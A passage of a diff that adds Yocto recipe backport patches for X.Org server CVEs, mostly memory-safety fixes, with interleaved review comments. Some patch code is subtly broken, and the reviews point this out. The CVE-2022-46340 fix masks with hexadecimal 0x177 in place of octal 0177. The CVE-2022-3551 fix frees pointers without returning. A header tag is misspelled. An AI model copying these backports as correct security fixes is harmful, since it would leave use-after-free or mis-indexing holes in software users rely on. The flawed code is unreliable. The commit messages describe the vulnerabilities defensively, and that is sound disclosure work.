- for (i = 0; i < stuff->nClients; i++, pClientID++) {
- swapl(pClientID);
- }
- if (stuff->nRanges >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
- - stuff->nClients)
- return BadLength;
- RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
-@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordCreateContext(client);
- } /* SProcRecordCreateContext */
-@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordRegisterClients(client);
- } /* SProcRecordRegisterClients */
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
+From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:40:21 +0000
+Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
+ attacks
+
+GetCountedString did a check for the whole string to be within the
+request buffer but not for the initial 2 bytes that contain the length
+field. A swapped client could send a malformed request to trigger a
+swaps() on those bytes, writing into random memory.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Ustream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
+CVE: CVE-2022-3550
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index 68c59df..bf8aaa3 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
+ CARD16 len;
+
+ wire = *wire_inout;
++
++ if (client->req_len <
++ bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
++ return BadValue;
++
+ len = *(CARD16 *) wire;
+ if (client->swapped) {
+ swaps(&len);
+--
+2.17.1
+
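Review bot: The status tag in this patch header is spelled `Ustream-Status:`, so tooling that scans for `Upstream-Status:` will likely treat the patch as having no status at all. It should read `Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]`. `Signed-off-by:Minjae Kim` also lacks the space after the colon, and the same spacing slip appears in CVE-2022-3551.patch and CVE-2022-3553.patch. For a security backport this tag is the link used to check the fix against upstream, so it is worth getting exactly right.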
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
+From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:44:00 +0000
+Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
+
+GetComponentByName returns an allocated string, so let's free that if we
+fail somewhere.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
+CVE: CVE-2022-3551
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 26 +++++++++++++++++++-------
+ 1 file changed, 19 insertions(+), 7 deletions(-)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index bf8aaa3..f79d306 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
+ xkb = dev->key->xkbInfo->desc;
+ status = Success;
+ str = (unsigned char *) &stuff[1];
+- if (GetComponentSpec(&str, TRUE, &status)) /* keymap, unsupported */
+- return BadMatch;
++ {
++ char *keymap = GetComponentSpec(&str, TRUE, &status); /* keymap, unsupported */
++ if (keymap) {
++ free(keymap);
++ return BadMatch;
++ }
++ }
+ names.keycodes = GetComponentSpec(&str, TRUE, &status);
+ names.types = GetComponentSpec(&str, TRUE, &status);
+ names.compat = GetComponentSpec(&str, TRUE, &status);
+ names.symbols = GetComponentSpec(&str, TRUE, &status);
+ names.geometry = GetComponentSpec(&str, TRUE, &status);
+- if (status != Success)
+- return status;
+- len = str - ((unsigned char *) stuff);
+- if ((XkbPaddedSize(len) / 4) != stuff->length)
+- return BadLength;
++ if (status == Success) {
++ len = str - ((unsigned char *) stuff);
++ if ((XkbPaddedSize(len) / 4) != stuff->length)
++ status = BadLength;
++ }
+
++ if (status != Success) {
++ free(names.keycodes);
++ free(names.types);
++ free(names.compat);
++ free(names.symbols);
++ free(names.geometry);
++ }
+ CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
+ CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
+
+--
+2.17.1
+
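Review bot: The new `if (status != Success)` block frees `names.keycodes` through `names.geometry` but never returns, whereas the lines it replaces did `return status;` and `return BadLength;`. As written in this hunk, a failed request falls through to `CHK_MASK_LEGAL` with five dangling pointers left in `names`, which risks a use-after-free or double free later in `ProcXkbGetKbdByName` (the rest of the function is outside the hunk). Add `return status;` as the last statement of that block, and compare the backport with the upstream commit referenced in the header.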
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
+From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
+From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+Date: Sun, 4 Dec 2022 17:46:18 +0000
+Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
+ Application menu due to mutaing immutable arrays
+
+Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
+
+Application Specific Backtrace 0:
+0 CoreFoundation 0x00007ff80d2c5e9b __exceptionPreprocess + 242
+1 libobjc.A.dylib 0x00007ff80d027e48 objc_exception_throw + 48
+2 CoreFoundation 0x00007ff80d38167b _CFThrowFormattedException + 194
+3 CoreFoundation 0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
+4 CoreFoundation 0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
+5 X11.bin 0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
+
+Fixes: https://github.com/XQuartz/XQuartz/issues/267
+Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
+CVE: CVE-2022-3553
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ hw/xquartz/X11Controller.m | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
+index 3efda50..9870ff2 100644
+--- a/hw/xquartz/X11Controller.m
++++ b/hw/xquartz/X11Controller.m
+@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
+ self.table_apps = table_apps;
+
+ NSArray * const apps = self.apps;
+- if (apps != nil)
+- [table_apps addObjectsFromArray:apps];
++
++ if (apps != nil) {
++ for (NSArray <NSString *> * row in apps) {
++ [table_apps addObject:row.mutableCopy];
++ }
++ }
+
+ columns = [apps_table tableColumns];
+ [[columns objectAtIndex:0] setIdentifier:@"0"];
+--
+2.17.1
+
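Review bot: This patch only touches `hw/xquartz/X11Controller.m`, Objective-C code for the macOS XQuartz server, which is presumably never compiled for the targets this recipe builds. Carrying it adds patch maintenance without changing the shipped binary. A `CVE_CHECK_WHITELIST += "CVE-2022-3553"` entry with a comment such as `# XQuartz (macOS) only, not built here` would document the real status, in the same way this commit handles CVE-2011-4613.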
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
+From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 5 Dec 2022 15:55:54 +1000
+Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
+
+Unlike other elements of the keymap, this pointer was freed but not
+reset. On a subsequent XkbGetKbdByName request, the server may access
+already freed memory.
+
+CVE-2022-4283, ZDI-CAN-19530
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
+CVE: CVE-2022-4283
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ xkb/xkbUtils.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
+index 8975ade..9bc51fc 100644
+--- a/xkb/xkbUtils.c
++++ b/xkb/xkbUtils.c
+@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
+ }
+ else {
+ free(dst->names->radio_groups);
++ dst->names->radio_groups = NULL;
+ }
+ dst->names->num_rg = src->names->num_rg;
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
+From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 12:55:45 +1000
+Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
+
+XTestSwapFakeInput assumes all events in this request are
+sizeof(xEvent) and iterates through these in 32-byte increments.
+However, a GenericEvent may be of arbitrary length longer than 32 bytes,
+so any GenericEvent in this list would result in subsequent events to be
+misparsed.
+
+Additional, the swapped event is written into a stack-allocated struct
+xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
+swapping the event may thus smash the stack like an avocado on toast.
+
+Catch this case early and return BadValue for any GenericEvent.
+Which is what would happen in unswapped setups anyway since XTest
+doesn't support GenericEvent.
+
+CVE-2022-46340, ZDI-CAN 19265
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
+CVE: CVE-2022-46340
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xtest.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Xext/xtest.c b/Xext/xtest.c
+index 38b8012..bf11789 100644
+--- a/Xext/xtest.c
++++ b/Xext/xtest.c
+@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
+
+ nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
+ for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
++ int evtype = ev->u.u.type & 0x177;
+ /* Swap event */
+- proc = EventSwapVector[ev->u.u.type & 0177];
++ proc = EventSwapVector[evtype];
+ /* no swapping proc; invalid event type? */
+- if (!proc || proc == NotImplemented) {
++ if (!proc || proc == NotImplemented || evtype == GenericEvent) {
+ client->errorValue = ev->u.u.type;
+ return BadValue;
+ }
+--
+2.25.1
+
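Review bot: The mask in `int evtype = ev->u.u.type & 0x177;` is hexadecimal, while the line it replaces used octal `0177` (0x7f). Assuming the event type field is one byte, 0x177 acts as 0x77, so bit 3 is dropped; an event type with that bit set then indexes the wrong `EventSwapVector` entry and is swapped by the wrong routine, or is rejected when it aliases `GenericEvent`. Keep the original mask: `int evtype = ev->u.u.type & 0177;`. The loop and the rest of `XTestSwapFakeInput` continue outside the hunk.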
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
+From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:55:32 +1000
+Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
+
+The XKB protocol effectively prevents us from ever using keycodes above
+255. For buttons it's theoretically possible but realistically too niche
+to worry about. For all other passive grabs, the detail must be zero
+anyway.
+
+This fixes an OOB write:
+
+ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
+temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
+For matching existing grabs, DeleteDetailFromMask is called with the
+stuff->detail value. This function creates a new mask with the one bit
+representing stuff->detail cleared.
+
+However, the array size for the new mask is 8 * sizeof(CARD32) bits,
+thus any detail above 255 results in an OOB array write.
+
+CVE-2022-46341, ZDI-CAN 19381
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
+CVE: CVE-2022-46341
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xipassivegrab.c | 22 ++++++++++++++--------
+ 1 file changed, 14 insertions(+), 8 deletions(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index d30f51f..89a5910 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* XI2 allows 32-bit keycodes but thanks to XKB we can never
++ * implement this. Just return an error for all keycodes that
++ * cannot work anyway, same for buttons > 255. */
++ if (stuff->detail > 255)
++ return XIAlreadyGrabbed;
++
+ if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
+ stuff->mask_len * 4) != Success)
+ return BadValue;
+@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ &param, XI2, &mask);
+ break;
+ case XIGrabtypeKeycode:
+- /* XI2 allows 32-bit keycodes but thanks to XKB we can never
+- * implement this. Just return an error for all keycodes that
+- * cannot work anyway */
+- if (stuff->detail > 255)
+- status = XIAlreadyGrabbed;
+- else
+- status = GrabKey(client, dev, mod_dev, stuff->detail,
+- &param, XI2, &mask);
++ status = GrabKey(client, dev, mod_dev, stuff->detail,
++ &param, XI2, &mask);
+ break;
+ case XIGrabtypeEnter:
+ case XIGrabtypeFocusIn:
+@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* We don't allow passive grabs for details > 255 anyway */
++ if (stuff->detail > 255) {
++ client->errorValue = stuff->detail;
++ return BadValue;
++ }
++
+ rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
+ if (rc != Success)
+ return rc;
+--
+2.25.1
+
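Review bot: The relocated check in `ProcXIPassiveGrabDevice` now does `return XIAlreadyGrabbed;`, where the removed code only assigned `status = XIAlreadyGrabbed` for the keycode case and carried on. `XIAlreadyGrabbed` looks like a grab status rather than a request error code, so returning it from the request handler may reach the client as an unrelated protocol error. The ungrab path added further down uses `client->errorValue = stuff->detail; return BadValue;` instead. It is worth confirming against upstream whether the grab path should do the same; both functions extend beyond the hunks shown.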
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
+From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Nov 2022 11:20:40 +1000
+Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
+ client
+
+This fixes a use-after-free bug:
+
+When a client first calls XvdiSelectVideoNotify() on a drawable with a
+TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
+is added twice to the resources:
+ - as the drawable's XvRTVideoNotifyList. This happens only once per
+ drawable, subsequent calls append to this list.
+ - as the client's XvRTVideoNotify. This happens for every client.
+
+The struct keeps the ClientPtr around once it has been added for a
+client. The idea, presumably, is that if the client disconnects we can remove
+all structs from the drawable's list that match the client (by resetting
+the ClientPtr to NULL), but if the drawable is destroyed we can remove
+and free the whole list.
+
+However, if the same client then calls XvdiSelectVideoNotify() on the
+same drawable with a FALSE onoff argument, only the ClientPtr on the
+existing struct was set to NULL. The struct itself remained in the
+client's resources.
+
+If the drawable is now destroyed, the resource system invokes
+XvdiDestroyVideoNotifyList which frees the whole list for this drawable
+- including our struct. This function however does not free the resource
+for the client since our ClientPtr is NULL.
+
+Later, when the client is destroyed and the resource system invokes
+XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
+a struct that has been freed previously. This is generally frowned upon.
+
+Fix this by calling FreeResource() on the second call instead of merely
+setting the ClientPtr to NULL. This removes the struct from the client
+resources (but not from the list), ensuring that it won't be accessed
+again when the client quits.
+
+Note that the assignment tpn->client = NULL; is superfluous since the
+XvdiDestroyVideoNotify function will do this anyway. But it's left for
+clarity and to match a similar invocation in XvdiSelectPortNotify.
+
+CVE-2022-46342, ZDI-CAN 19400
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
+CVE: CVE-2022-46342
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xvmain.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xext/xvmain.c b/Xext/xvmain.c
+index c520c7d..5f4c174 100644
+--- a/Xext/xvmain.c
++++ b/Xext/xvmain.c
+@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
+ tpn = pn;
+ while (tpn) {
+ if (tpn->client == client) {
+- if (!onoff)
++ if (!onoff) {
+ tpn->client = NULL;
++ FreeResource(tpn->id, XvRTVideoNotify);
++ }
+ return Success;
+ }
+ if (!tpn->client)
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
+From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 14:53:07 +1000
+Subject: [PATCH] Xext: free the screen saver resource when replacing it
+
+This fixes a use-after-free bug:
+
+When a client first calls ScreenSaverSetAttributes(), a struct
+ScreenSaverAttrRec is allocated and added to the client's
+resources.
+
+When the same client calls ScreenSaverSetAttributes() again, a new
+struct ScreenSaverAttrRec is allocated, replacing the old struct. The
+old struct was freed but not removed from the clients resources.
+
+Later, when the client is destroyed the resource system invokes
+ScreenSaverFreeAttr and attempts to clean up the already freed struct.
+
+Fix this by letting the resource system free the old attrs instead.
+
+CVE-2022-46343, ZDI-CAN 19404
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
+CVE: CVE-2022-46343
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/saver.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Xext/saver.c b/Xext/saver.c
+index c23907d..05b9ca3 100644
+--- a/Xext/saver.c
++++ b/Xext/saver.c
+@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
+ pVlist++;
+ }
+ if (pPriv->attr)
+- FreeScreenAttr(pPriv->attr);
++ FreeResource(pPriv->attr->resource, AttrType);
+ pPriv->attr = pAttr;
+ pAttr->resource = FakeClientID(client->index);
+ if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
+From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:26:57 +1000
+Subject: [PATCH] Xi: avoid integer truncation in length check of
+ ProcXIChangeProperty
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->num_items value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->num_items bytes, i.e. 4GB.
+
+The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
+so let's fix that too.
+
+CVE-2022-46344, ZDI-CAN 19405
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
+CVE: CVE-2022-46344
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ dix/property.c | 3 ++-
+ 2 files changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 6ec419e..0cfa6e3 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
+ REQUEST(xChangeDevicePropertyReq);
+ DeviceIntPtr dev;
+ unsigned long len;
+- int totalSize;
++ uint64_t totalSize;
+ int rc;
+
+ REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
+@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
+ {
+ int rc;
+ DeviceIntPtr dev;
+- int totalSize;
++ uint64_t totalSize;
+ unsigned long len;
+
+ REQUEST(xXIChangePropertyReq);
+diff --git a/dix/property.c b/dix/property.c
+index ff1d669..6fdb74a 100644
+--- a/dix/property.c
++++ b/dix/property.c
+@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
+ WindowPtr pWin;
+ char format, mode;
+ unsigned long len;
+- int sizeInBytes, totalSize, err;
++ int sizeInBytes, err;
++ uint64_t totalSize;
+
+ REQUEST(xChangePropertyReq);
+
+--
+2.25.1
+
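Review bot: The widened `totalSize` declarations carry no comment saying that the width is what keeps the request-length check sound, so a later cleanup could narrow them back to `int`. This applies to all three hunks here (ProcXChangeDeviceProperty, ProcXIChangeProperty, ProcChangeProperty) and to the two declarations in CVE-2023-6478.patch. I would write `uint64_t totalSize; /* 64-bit: item count times item size must not truncate before the length check */` at each site. The multiplication and the REQUEST_FIXED_SIZE check are outside these hunks. Because `len` is `unsigned long`, which is 32 bits on ILP32 targets, it is worth confirming on 32-bit builds that the product is bounded or formed in 64 bits before it is assigned.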
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
+From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 25 Jan 2023 11:41:40 +1000
+Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
+
+CVE-2023-0494, ZDI-CAN-19596
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
+CVE: CVE-2023-0494
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 217baa9561..dcd4efb3bc 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+ sizeof(XkbAction));
+ }
+- else
++ else {
+ free(to->button->xkb_acts);
++ to->button->xkb_acts = NULL;
++ }
+
+ memcpy(to->button->labels, from->button->labels,
+ from->button->numButtons * sizeof(Atom));
+--
+GitLab
+
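Review bot: The context at the top of the Xi/exevents.c hunk still copies a single `sizeof(XkbAction)` into `to->button->xkb_acts`, and this patch leaves that as is; on this page the copy is only corrected by CVE-2023-6377.patch. That later patch edits the same block and its `index dcd4efb3bc..54ea11a938` line starts from this patch's post-image (`217baa9561..dcd4efb3bc`), so the two have to be applied in that order in the recipe, which is not visible here. A short comment on the new line, e.g. `to->button->xkb_acts = NULL; /* freed above; do not leave a dangling pointer */`, would also record why the assignment exists. DeepCopyPointerClasses starts and ends outside the hunk.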
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
+From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Mon, 13 Mar 2023 11:08:47 +0100
+Subject: [PATCH] composite: Fix use-after-free of the COW
+
+ZDI-CAN-19866/CVE-2023-1393
+
+If a client explicitly destroys the compositor overlay window (aka COW),
+we would leave a dangling pointer to that window in the CompScreen
+structure, which will trigger a use-after-free later.
+
+Make sure to clear the CompScreen pointer to the COW when the latter gets
+destroyed explicitly by the client.
+
